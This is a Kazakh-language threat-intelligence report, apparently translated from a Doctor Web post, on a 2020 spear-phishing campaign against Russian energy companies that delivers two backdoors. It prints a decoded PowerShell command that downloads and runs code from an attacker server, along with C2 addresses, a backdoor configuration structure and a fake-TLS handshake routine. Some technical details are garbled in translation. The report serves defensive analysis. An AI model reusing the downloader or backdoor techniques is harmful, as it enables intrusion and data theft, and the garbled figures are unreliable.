Компьютерлік қауіпсіздік инциденттерін зерттеудегі тәжірибеміз көрсеткендей, электрондық пошта әлі де шабуылдаушы желілік инфрақұрылымдарға бастапқыда ену үшін шабуылдаушылар пайдаланатын ең көп таралған арналардың бірі болып табылады. Күдікті (немесе соншалықты күдікті емес) әріппен жасалған бір абайсыз әрекет одан әрі жұқтыру үшін кіру нүктесіне айналады, сондықтан киберқылмыскерлер әр түрлі табысқа ие болса да, әлеуметтік инженерия әдістерін белсенді түрде қолданады.
Бұл мақалада біз Ресейдің отын-энергетикалық кешеніндегі бірқатар кәсіпорындарға бағытталған спам-науқанға қатысты жақында жүргізген тергеуіміз туралы айтқымыз келеді. Барлық шабуылдар бірдей сценарий бойынша жалған электрондық хаттарды қолданды және ешкім бұл хаттардың мәтіндік мазмұнына көп күш жұмсамаған сияқты.
Зияткерлік қызмет
Мұның бәрі 2020 жылдың сәуір айының соңында, Doctor Web вирусының сарапшылары хакерлер ресейлік отын-энергетика кешеніндегі бірқатар кәсіпорындардың қызметкерлеріне жаңартылған телефон анықтамалығын жіберген спам-науқанды анықтаған кезде басталды. Әрине, бұл жай алаңдаушылық емес еді, өйткені каталог нақты емес және .docx құжаттары қашықтағы ресурстардан екі суретті жүктеп алған.
Олардың бірі news[.]zannews[.]com серверінен пайдаланушының компьютеріне жүктелді. Бір қызығы, домендік атау Қазақстанның сыбайлас жемқорлыққа қарсы медиа орталығының – zannews[.]kz доменіне ұқсас. Екінші жағынан, пайдаланылған домен ICEFOG бэкдорын пайдаланатын және атауларында «жаңалықтар» ішкі жолы бар трояндық басқару домендері бар TOPNEWS деп аталатын 2015 жылғы басқа науқанды еске түсірді. Тағы бір қызықты ерекшелігі, әртүрлі алушыларға электрондық хаттарды жіберу кезінде суретті жүктеп алу сұраулары әртүрлі сұрау параметрлерін немесе бірегей кескін атауларын пайдаланды.
Бұл хатты қажетті уақытта ашуға кепілдік беретін «сенімді» адресатты анықтау үшін ақпарат жинау мақсатында жасалды деп есептейміз. Екінші серверден суретті жүктеп алу үшін SMB хаттамасы пайдаланылды, бұл қабылданған құжатты ашқан қызметкерлердің компьютерлерінен NetNTLM хэштерін жинау үшін жасалуы мүмкін.
Міне, жалған каталогы бар хаттың өзі:
Осы жылдың маусым айында хакерлер суреттерді жүктеп салу үшін sports[.]manhajnews[.]com жаңа домен атауын пайдалана бастады. Талдау көрсеткендей, manhajnews[.]com ішкі домендері кем дегенде 2019 жылдың қыркүйегінен бастап спам-хабарламаларда қолданылған. Бұл науқанның бір нысанасы Ресейдің үлкен университеті болды.
Сондай-ақ маусым айына қарай шабуылды ұйымдастырушылар өздерінің хаттары үшін жаңа мәтін ойлап тапты: бұл жолы құжатта саланың дамуы туралы ақпарат болды. Хат мәтінінде оның авторының не орыс тілін меңгермегені, не өзі туралы әдейі осындай әсер қалдырып отырғаны анық көрсетілген. Өкінішке орай, саланы дамыту идеялары, әдеттегідей, жай ғана мұқаба болып шықты - құжат қайтадан екі суретті жүктеп алды, ал сервер жүктеу[.]inklingpaper[.]com болып өзгертілді.
Келесі жаңашылдық шілде айында пайда болды. Зиянды құжаттарды антивирустық бағдарламалар арқылы анықтауды айналып өту әрекетінде шабуылдаушылар құпия сөзбен шифрланған Microsoft Word құжаттарын пайдалана бастады. Сонымен бірге шабуылдаушылар классикалық әлеуметтік инженерия әдісін - марапаттау туралы хабарламаны қолдануға шешім қабылдады.
Үндеу мәтіні тағы да сол стильде жазылып, адресат арасында қосымша күдік тудырды. Кескінді жүктеп алуға арналған сервер де өзгерген жоқ.
Барлық жағдайларда хаттарды жіберу үшін mail[.]ru және yandex[.]ru домендерінде тіркелген электрондық пошта жәшіктері пайдаланылғанын ескеріңіз.
Атака
2020 жылдың қыркүйек айының басында әрекет ету уақыты келді. Біздің вирус талдаушыларымыз шабуылдардың жаңа толқынын тіркеді, онда шабуылдаушылар телефон анықтамалығын жаңарту сылтауымен қайтадан хаттар жіберді. Дегенмен, бұл жолы тіркемеде зиянды макрос болды.
Қосылған құжатты ашқан кезде макрос екі файлды құрады:
- VBS сценарийі %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, ол пакеттік файлды іске қосуға арналған;
- Пакеттік файлдың өзі %APPDATA%configstest.bat, ол түсініксіз болды.
Оның жұмысының мәні белгілі бір параметрлері бар Powershell қабықшасын іске қосуға байланысты. Қабықшаға жіберілген параметрлер командаларға декодталған:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Ұсынылған пәрмендерден келесідей, пайдалы жүктеме жүктелетін домен қайтадан жаңалықтар сайты ретінде жасырылады. Қарапайым , оның жалғыз міндеті пәрмен және басқару серверінен қабық кодын алу және оны орындау. Біз жәбірленушінің компьютеріне орнатуға болатын бэкдордың екі түрін анықтай алдық.
BackDoor.Siggen2.3238
Біріншісі BackDoor.Siggen2.3238 — біздің мамандар бұрын кездескен жоқ, сонымен қатар басқа антивирус жеткізушілері де бұл бағдарлама туралы айтқан жоқ.
Бұл бағдарлама C++ тілінде жазылған және 32-биттік Windows операциялық жүйелерінде жұмыс істейтін бэкдор.
BackDoor.Siggen2.3238 екі протоколды пайдалана отырып, басқару серверімен байланыса алады: HTTP және HTTPS. Тексерілген үлгі HTTPS протоколын пайдаланады. Серверге сұрауларда келесі User-Agent пайдаланылады:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
Бұл жағдайда барлық сұраулар келесі параметрлер жиынтығымен қамтамасыз етіледі:
%s;type=%s;length=%s;realdata=%send
мұндағы әрбір %s жолы сәйкесінше келесімен ауыстырылады:
- жұқтырған компьютердің идентификаторы,
- жіберілетін сұрау түрі,
- нақты деректер өрісіндегі деректер ұзындығы,
- деректер.
Вирус жұқтырған жүйе туралы ақпаратты жинау кезеңінде бэкдор келесідей сызық жасайды:
lan=%s;cmpname=%s;username=%s;version=%s;
мұндағы lan – вирус жұққан компьютердің IP мекенжайы, cmpname – компьютердің аты, пайдаланушы аты – пайдаланушы аты, нұсқасы – 0.0.4.03 жолы.
Бұл ақпарат sysinfo идентификаторымен POST сұрауы арқылы https[:]//31.214[.]157.14/log.txt мекенжайында орналасқан басқару серверіне жіберіледі. Жауап болса BackDoor.Siggen2.3238 ЖҮРЕК сигналын қабылдайды, қосылым сәтті деп есептеледі, ал бэкдор сервермен байланыстың негізгі циклін бастайды.
Жұмыс принциптерінің толық сипаттамасы BackDoor.Siggen2.3238 бізде бар .
BackDoor.Whitebird.23
Екінші бағдарлама - Қазақстандағы мемлекеттік мекемемен болған оқиғадан бізге белгілі BackDoor.Whitebird бэкдорының модификациясы. Бұл нұсқа C++ тілінде жазылған және 32 биттік және 64 биттік Windows операциялық жүйелерінде жұмыс істеуге арналған.
Осы түрдегі көптеген бағдарламалар сияқты, BackDoor.Whitebird.23 басқару серверімен шифрланған байланыс орнатуға және вирус жұққан компьютерді рұқсатсыз басқаруға арналған. Тамшылатқышты пайдаланып бұзылған жүйеге орнатылған .
Біз зерттеген үлгі екі экспорты бар зиянды кітапхана болды:
- Google Play
- Сынақ.
Жұмыстың басында ол 0x99 байты бар XOR операциясына негізделген алгоритмді пайдалана отырып, бэкдор корпусына қосылған конфигурацияны шифрдан шығарады. Конфигурация келесідей көрінеді:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Оның тұрақты жұмысын қамтамасыз ету үшін бэкдор өрісте көрсетілген мәнді өзгертеді жұмыс сағаттары конфигурациялар. Өріс 1440 немесе 0 мәндерін қабылдайтын және күндегі әрбір сағаттың әрбір минутын көрсететін 1 байттан тұрады. Интерфейсті тыңдайтын және вирус жұққан компьютерден прокси серверде авторизация пакеттерін іздейтін әрбір желі интерфейсі үшін бөлек ағын жасайды. Мұндай пакет анықталған кезде, бэкдор өз тізіміне прокси сервер туралы ақпаратты қосады. Сонымен қатар, WinAPI арқылы проксидің болуын тексереді InternetQueryOptionW.
Бағдарлама ағымдағы минут пен сағатты тексереді және оны өрістегі деректермен салыстырады жұмыс сағаттары конфигурациялар. Егер күннің сәйкес минутына арналған мән нөлге тең болмаса, онда басқару серверімен байланыс орнатылады.
Серверге қосылым орнату клиент пен сервер арасындағы TLS 1.0 нұсқасы хаттамасын пайдаланып қосылым жасауды имитациялайды. Бэк есіктің корпусында екі буфер бар.
Бірінші буферде TLS 1.0 Client Hello пакеті бар.
Екінші буферде кілт ұзындығы 1.0x0 байт, Change Cipher Spec, шифрланған қол алысу хабары бар TLS 100 Client Key Exchange пакеттері бар.
Client Hello пакетін жіберген кезде бэкдор ағымдағы уақыттың 4 байты және псевдокездейсоқ деректердің 28 байты Client Random өрісіне келесідей есептелетіндей жазады:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Алынған пакет басқару серверіне жіберіледі. Жауап (Server Hello пакеті) тексереді:
- TLS протоколының 1.0 нұсқасына сәйкестік;
- клиент көрсеткен уақыт белгісінің (кездейсоқ деректер пакеті өрісінің алғашқы 4 байты) сервер көрсеткен уақыт белгісіне сәйкестігі;
- клиент пен сервердің Кездейсоқ деректер өрісіндегі уақыт белгісінен кейінгі алғашқы 4 байттың сәйкестігі.
Көрсетілген сәйкестіктер жағдайында бэкдор Клиент кілттерінің алмасу пакетін дайындайды. Мұны істеу үшін ол Client Key Exchange бумасындағы Ашық кілтті, сондай-ақ Шифрланған қол алысу хабары бумасындағы Шифрлау IV және Шифрлау деректерін өзгертеді.
Содан кейін бэкдор пакетті командалық және басқару серверінен алады, TLS протоколының нұсқасы 1.0 екенін тексереді, содан кейін тағы 54 байтты (пакеттің негізгі бөлігі) қабылдайды. Бұл қосылымды орнатуды аяқтайды.
Жұмыс принциптерінің толық сипаттамасы BackDoor.Whitebird.23 бізде бар .
Қорытынды және қорытындылар
Құжаттарды, зиянды бағдарламаларды және пайдаланылған инфрақұрылымды талдау шабуылды қытайлық APT топтарының бірі дайындағанын сенімді түрде айтуға мүмкіндік береді. Сәтті шабуыл кезінде жәбірленушілердің компьютерлеріне орнатылатын бэкдорлардың функционалдығын ескере отырып, инфекция, кем дегенде, шабуылға ұшыраған ұйымдардың компьютерлерінен құпия ақпаратты ұрлауға әкеледі.
Сонымен қатар, өте ықтимал сценарий - арнайы функциясы бар жергілікті серверлерде мамандандырылған трояндарды орнату. Бұл домен контроллері, пошта серверлері, интернет шлюздері және т.б. болуы мүмкін. Мысалдан көріп отырғанымыздай , мұндай серверлер әртүрлі себептермен шабуылдаушыларды ерекше қызықтырады.
Ақпарат көзі: www.habr.com